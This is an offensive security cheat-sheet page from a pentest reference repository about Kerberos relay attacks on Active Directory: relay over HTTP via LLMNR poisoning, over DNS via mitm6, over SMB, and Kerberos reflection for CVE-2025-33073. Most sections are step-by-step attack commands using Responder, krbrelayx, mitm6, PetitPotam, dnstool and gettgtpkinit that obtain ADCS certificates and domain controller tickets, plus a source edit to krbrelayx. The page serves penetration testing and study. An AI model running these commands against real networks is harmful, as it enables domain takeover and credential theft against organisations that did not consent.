internal-relay-kerberos.md (7574B)
1 --- 2 title: "Internal - Kerberos Relay" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-relay-kerberos.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-kerberos.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - Kerberos Relay 12 13 ## Kerberos Relay over HTTP 14 15 **Requirements**: 16 17 * Kerberos authentication for services without signing 18 19 HTTP through multicast poisoning (LLMNR) 20 21 * An attacker sets up an LLMNR poisoner on the multicast range. 22 * An HTTP client on the multicast range fails to resolve a hostname. This can happen because of a typo in a browser, a misconfiguration, but this can also be triggered by an attacker via WebDav coercion. 23 * The LLMNR poisoner indicates that the hostname resolves to the attacker’s machine. In the LLMNR response, the answer name differs from the query and corresponds to an arbitrary relay target. 24 * The victim performs a request on the attacker web server, which requires Kerberos authentication. 25 * The victim asks for a ST with the SPN of the relay target. It then sends the resulting AP-REQ to the attacker web server. 26 * The attacker extracts the AP-REQ and relays it to a service of the relay target. 27 28 **Example**: ESC8 with Kerberos Relay 29 30 ```ps1 31 python3 Responder.py -I eth0 -N <PKI_SERVER_NETBIOS_NAME> 32 sudo python3 krbrelayx.py --target 'http://<PKI_SERVER>.<DOMAIN.LOCAL>/certsrv/' -ip <ATTACKER_IP> --adcs --template User -debug 33 ``` 34 35 ## Kerberos Relay over DNS 36 37 Abuses the DNS Secure Dynamic Updates in Active Directory. 38 39 * [dirkjanm/mitm6](https://github.com/dirkjanm/mitm6) 40 * [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) 41 * [dirkjanm/PKINITtools](https://github.com/dirkjanm/PKINITtools) 42 43 **Steps**: 44 45 * The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in. 46 * The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp. 47 * The client attempts a dynamic update on the A record with their name in the zone internal.corp. 48 * This dynamic update is refused by the server because no authentication is provided. 49 * The client uses a TKEY query to negotiate a secret key for authenticated queries. 50 * The server answers with a TKEY Resource Record, which completes the authentication. 51 * The client sends the dynamic update again, but now accompanied by a TSIG record, which is a signature using the key established in steps 5 and 6. 52 * The server acknowledges the dynamic update. The new DNS record is now in place. 53 54 ```ps1 55 # Example - Relay to ADCS - ESC8 56 sudo krbrelayx.py --target http://adscert.internal.corp/certsrv/ -ip 192.168.111.80 --victim icorp-w10.internal.corp --adcs --template Machine 57 sudo mitm6 --domain internal.corp --host-allowlist icorp-w10.internal.corp --relay adscert.internal.corp -v 58 python gettgtpkinit.py -pfx-base64 MIIRFQIBA..cut...lODSghScECP5hGFE3PXoz internal.corp/icorp-w10$ icorp-w10.ccache 59 ``` 60 61 ## Kerberos Relay over SMB 62 63 Abuses the way SMB clients construct SPNs when asking for a ST. 64 65 * [cube0x0/KrbRelay](https://github.com/cube0x0/KrbRelay) - Framework for Kerberos relaying. 66 * [decoder-it/KrbRelayEx-RPC](https://github.com/decoder-it/KrbRelayEx-RPC) - Kerberos Relay and Forwarder for (Fake) RPC/DCOM MiTM Server. 67 68 ```ps1 69 dnstool.py -u "DOMAIN.LOCAL\\user" -p "pass" -r "pki1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" -d "10.10.10.10" --action add "10.10.10.11" --tcp 70 petitpotam.py -u 'user' -p 'pass' -d DOMAIN.LOCAL 'pki1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc.domain.local 71 krbrelayx.py -t 'http://pki.domain.local/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC$' 72 gettgtpkinit.py -cert-pfx 'DC$.pfx' 'DOMAIN.LOCAL/DC$' DC.ccache 73 ``` 74 75 ## Kerberos Reflection - CVE-2025-33073 76 77 Relay one machine to itself by using the `1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` trick. Also, grants local admin privilege. 78 79  80 81 * Add a DNS record for `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` pointing to our IP address. It is also possible to compromise any vulnerable machine by registering `localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`. 82 83 ```ps1 84 dnstool.py -u 'domain.local\username' -p 'P@ssw0rd' 10.10.10.10 -a add -r target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 198.51.100.27 85 # OR 86 pretender -i "vmnet2" --spoof "target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" --no-dhcp --no-timestamps 87 ``` 88 89 * Edit `krbrelayx/lib/servers/smbrelayserver.py` and remove these lines 90 91 ```ps1 92 156: blob['tokenOid'] = '1.3.6.1.5.5.2' 93 157: blob['innerContextToken']['mechTypes'].extend([MechType(TypesMech['KRB5 - Kerberos 5']), 94 158: MechType(TypesMech['MS KRB5 - Microsoft Kerberos 5']), 95 159: MechType(TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'])]) 96 ``` 97 98 * Start the relay to catch the callback from TARGET. 99 100 ```ps1 101 krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support 102 krbrelayx.py --target smb://target.lab.redteam -c whoam 103 ``` 104 105 * Trigger a callback from the server to `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` using PetitPotam. 106 107 ```ps1 108 nxc smb TARGET.domain.local -u username -p 'P@ssw0rd' -M coerce_plus -o M=Petitpotam LISTENER=target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 109 # OR 110 petitpotam.py -d domain.local -u username -p 'password' "TARGET1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" "TARGET.DOMAIN.LOCAL" 111 # OR 112 wspcoerce 'lab.redteam/user:password@target.lab.redteam' file:////target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA/path 113 ``` 114 115 ## References 116 117 * [A Look in the Mirror - The Reflective Kerberos Relay Attack - RedTeam Pentesting - June 11, 2025](https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/) 118 * [Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx - Quentin Roland - January 27, 2025](https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with) 119 * [From NTLM relay to Kerberos relay: Everything you need to know - Decoder - April 24, 2025](https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/) 120 * [NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 - Wilfried Bécard and Guillaume André - June 11, 2025](https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025) 121 * [Relaying Kerberos over DNS using krbrelayx and mitm6 - Dirk-jan Mollema - February 22, 2022](https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/) 122 * [Relaying Kerberos over SMB using krbrelayx - Hugo Vincent - November 20, 2024](https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx) 123 * [Using Kerberos for Authentication Relay Attacks - James Forshaw - October 20, 2021](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html) 124 * [Windows Exploitation Tricks: Relaying DCOM Authentication - James Forshaw - October 20, 2021](https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html)